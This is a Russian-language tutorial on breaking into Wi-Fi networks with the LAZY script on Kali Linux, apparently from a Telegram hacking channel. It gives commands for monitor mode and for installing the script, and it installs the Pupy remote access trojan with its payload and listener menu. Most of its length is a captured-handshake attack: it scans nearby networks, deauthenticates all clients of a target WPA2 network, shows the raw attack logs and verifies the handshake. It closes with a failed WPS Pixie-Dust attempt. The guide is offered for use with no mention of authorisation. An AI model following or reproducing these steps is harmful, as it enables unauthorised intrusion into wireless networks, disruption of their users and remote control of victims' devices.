Взлом WI - FI
BLACK TelegramШаг 1: Обновление Kali Linux
Для использования скрипта LAZY, обновляем Kali Linux.
Если ваша система Kali полностью обновлена, вы можете ожидать довольно плавного процесса установки. Перед началом выполните следующие команды
apt update apt upgrade
Шаг 2: Найдите имя вашего беспроводного сетевого адаптера
Обычно Kali-совместимым беспроводным сетевым адаптером будет wlan0 или wlan1. В режиме мониторинга измените его имя на wlan0mon или wlan1mon.
Проверьте имя вашего адаптера после перевода его в режим мониторинга, написав следущее и наблюдая за его именем:
iwconfig wlan0 mode monitor ip a
Далее начинаем загрузку и использование «lazy» скрипт.
Шаг 3: Установите и настройте ленивый скрипт
Для установки откройте окно терминала и вставьте приведенный ниже код, по одной строке за раз, затем установите сценарий LAZY.
cd git clone https://github.com/arismelachroinos/lscript.git cd lscript chmod +x install.sh ./install.sh
Когда настроите интерфейс, укажите имя вашего беспроводного сетевого адаптера.
Шаг 4: Используйте основные сетевые инструменты
Находим локальную информацию, просто набрав l, чтобы получить информацию о локальном IP, как показано ниже.
Local IPs: eth0 = 192.168.86.42 Gateways: eth0 = 192.168.86.1 Press any key to go back...
После этого мы можем сканировать сеть на наличие других устройств. Ниже команды, которые позволят нам узнать больше информации о сети:
- if - Запускает ifconfig и выдает имена и информацию обо всех сетевых устройствах.
- 1 - Включить wlan0 (d1 отключает его).3
- 2 - Ключить wlan0mon (d2 оключает его).
- 3 - рандомизируйте или установите MAC-адрес на определенное значение.
- 7 - Просмотрите общедоступный IP-адрес, который ваш компьютер оставляет на посещаемых вами сайтах.
- 19 - Найдите физический адрес данного IP-адреса, чтобы определить его относительное местоположение.
- scan - Запустите сканирование ARP в сети, чтобы обнаружить близлежащие устройства.
- start - запуск режима мониторинга на адаптере беспроводной сети.
- stop - Остановить режим беспроводного мониторинга на сетевом адаптере.
Шаг 5: Установите новые инструменты
Загрузим Pupy, основанную на Python RAT. .
В следующем меню представлены основные категории с параметрами для управления установкой сценариев:
- 1 - инструменты Wi-Fi (инструменты для атаки на беспроводные сети).
- 2 - Удаленный доступ (инструменты для получения удаленного доступа к другим устройствам и удаленного управления ими).
- 3 - Сбор информации (сбор информации о людях или веб-сайте).
- 4 - Инструменты сайта (инструменты для взлома или атаки сайтов).
- 5 - Другое (сборник других хакерских инструментов).
Чтобы установить Pupy, перейдем к варианту 2 - удаленному доступу. Здесь мы выбираем опцию 3 для Pupy. Теперь мы видим, что Pupy не установлен, потому что он отображается красным цветом.
Чтобы установить Pupy, выберите 3, и при появлении запроса введите install, чтобы скрипт LAZY управлял установкой.
Tool is not installed. To install it type 'install'. install Installing Pupy Tool by n1nj4sec Cloning into 'pupy'... remote: Counting objects: 16472, done. remote: Compressing objects: 100% (35/35), done. remote: Total 16472 (delta 20), reused 47 (delta 20), pack-reused 16416 Receiving objects: 100% (16472/16472), 27.77 MiB | 4.99 MiB/s, done. Resolving deltas: 100% (11706/11706), done.
При завершении установки, опция должна появиться в зеленом цвете. Теперь выбираем опцию 3 и переходим к Pupy.
1) Generate a payload 2) Start listener b) Go back 00) Main menu 0) EXIT
Теперь мы можем набрать 00, чтобы вернуться в главное меню, чтобы изучить еще некоторые функции LAZY-скрипта.
Шаг 6: Захватите рукопожатие WPA через ленивый скрипт
Если у вас есть Kali-совместимый адаптер беспроводной сети, вы должны были указать это имя для сценария LAZY в шаге 3 выше, или вы можете сделать это сейчас, набрав interfaces и установив имя адаптера в режиме станции и мониторинга.
Установив, выбираем опцию 10, чтобы выбрать меню рукопожатия. Для начала, подтверждаем, что хотим перевести адаптер в режим монитора. Чтобы подтвердить вводим Y. Когда это будет сделано, откроется новое окно терминала.
----------------------------HANDSHAKE---------------------------- 1) Scan networks nearby Selected:None 2) Capture handshake 3) Aircrack the handshake 4) Verify a handshake 5) Clean a handshake 6) Remove .csv and .netxml files 0) Exit Choose:
Чтобы увидеть сетевой трафик поблизости выбираем опцию 1. Дайте этому поработать минуту или две, а затем нажмите Crtl-C, чтобы остановить сканирование.
CH 12 ][ Elapsed: 6 s ][ 2018-07-04 04:33 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:25:00:FF:94:73 -1 0 1 0 6 -1 OPN <length: 0> 70:3A:CB:DB:5A:78 -41 11 3 0 11 130 WPA2 CCMP PSK takeyourgodd 70:3A:CB:DB:5C:A8 -59 22 0 0 6 130 WPA2 CCMP PSK takeyourgodd 70:3A:CB:DB:5C:B4 -71 6 0 0 1 130 WPA2 CCMP PSK takeyourgodd C4:8E:8F:E5:6A:B4 -75 7 0 0 1 195 WPA2 CCMP PSK TG1672G12 BSSID STATION PWR RATE Lost Frames Probe 00:25:00:FF:94:73 obfuscated -43 0 -12 21 8 00:25:00:FF:94:73 obfuscated -33 0 -12 104 4 00:25:00:FF:94:73 obfuscated -51 0 -12 107 4 00:25:00:FF:94:73 obfuscated -53 0 -12 34 8 (not associated) obfuscated -70 0 - 1 12 8
Вы увидите список сетей, в которых есть трафик. Выбераем номер целевой сети и нажмаем Return, чтобы продолжить.
После ввода имени и нажатия кнопки возврата откроется новое окно, в котором представлены варианты отключения устройств от сети. Выберите опцию 1, чтобы отменить аутентификацию всех клиентов и быстро получить сетевое рукопожатие.
----------------DEAUTH MENU---------------- 1) Deauth all aireplay-ng 2) Deauth all mdk3 3) Deauth client/s aireplay-ng 4) Deauth all periodically aireplay-ng 0) Exit -------------------------------------------HANDSHAKE------------------------------------------- CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:33 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 70:3A:CB:DB:5A:78 -40 87 134 92 6 11 130 WPA2 CCMP PSK takeyourgodd BSSID STATION PWR Rate Lost Frames Probe 70:3A:CB:DB:5A:78 obfuscated -72 0 - 0 22 6
Откроется новое окно, показывающее статус атаки деавторизации. Нажмите Ctrl-C, чтобы остановить атаку по умолчанию.
----------------DEAUTH MENU---------------- 1) Deauth all aireplay-ng 2) Deauth all mdk3 3) Deauth client/s aireplay-ng 4) Deauth all periodically aireplay-ng ENTER) Last option 0) Exit -------------------------------------------HANDSHAKE------------------------------------------- CH 11 ][ Elapsed: 2 mins ][ 2018-07-04 04:36 ][ WPA handshake: 70:3A:CB:DB:5A:78 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 70:3A:CB:DB:5A:78 -7 100 1307 151 2 11 130 WPA2 CCMP PSK takeyourgodd BSSID STATION PWR Rate Lost Frames Probe 70:3A:CB:DB:5A:78 obfuscated -33 1e - 1e 0 12 ---------------------------------DEAUTHING--------------------------------- 04:36:17 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:18 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:18 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:20 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:20 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:21 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:21 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:22 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:22 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:23 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78] 04:36:23 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
После выбора сети вы попадете в меню «рукопожатие». Здесь мы можем подтвердить рукопожатие, которое мы только что захватили, выбрав опцию 4, которая должна подтвердить рукопожатие.
----------------------------HANDSHAKE---------------------------- 1) Scan networks nearby Selected:takeyourgoddamnshoesoff 2) Capture handshake 3) Aircrack the handshake 4) Verify a handshake 5) Clean a handshake 6) Remove .csv and .netxml files 0) Exit Choose:
В меню deauth вы увидите параметры для подтверждения того, что вы успешно захватили рукопожатие. Выберите вариант 2, чтобы проверить рукопожатие с Cowpatty.
-------DEAUTH MENU------- 1) Check with pyrit 2) Check with cowpatty b) Go back Choose: 1 -------------------------------------------HANDSHAKE------------------------------------------- CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:37 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 70:3A:CB:DB:5A:78 -40 100 156 0 0 11 130 WPA2 CCMP PSK takeyourgodd BSSID STATION PWR Rate Lost Frames Probe
Here, you can see our handshake is valid:
-------DEAUTH MENU------- Valid handshake found! -------------------------------------------HANDSHAKE------------------------------------------- CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:37 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 70:3A:CB:DB:5A:78 -37 96 297 0 0 11 130 WPA2 CCMP PSK takeyourgodd BSSID STATION PWR Rate Lost Frames Probe
После подтверждения того, что рукопожатие действительно, вы вернетесь обратно в меню рукопожатия. Выберите опцию 0, чтобы выйти из скрипта.
----------------------------HANDSHAKE---------------------------- 1) Scan networks nearby Selected:takeyourgoddamnshoesoff 2) Capture handshake 3) Aircrack the handshake 4) Verify a handshake 5) Clean a handshake 6) Remove .csv and .netxml files 0) Exit Choose:
При выходе сценарий спросит, захватили ли вы рукопожатие WPA. Если вы это сделали, обязательно наберите y, чтобы сохранить захваченное рукопожатие под именем файла, которое вы указали ранее.
Шаг 7: Используйте WPS Pixie-Dust Attack (работа в процессе).
Две основные атаки вернули «слишком много аргументов», а не какие-либо полезные результаты. Последний вариант, цикл Pixie-Dust, завершился ошибкой после накопления антиклиматического эффекта.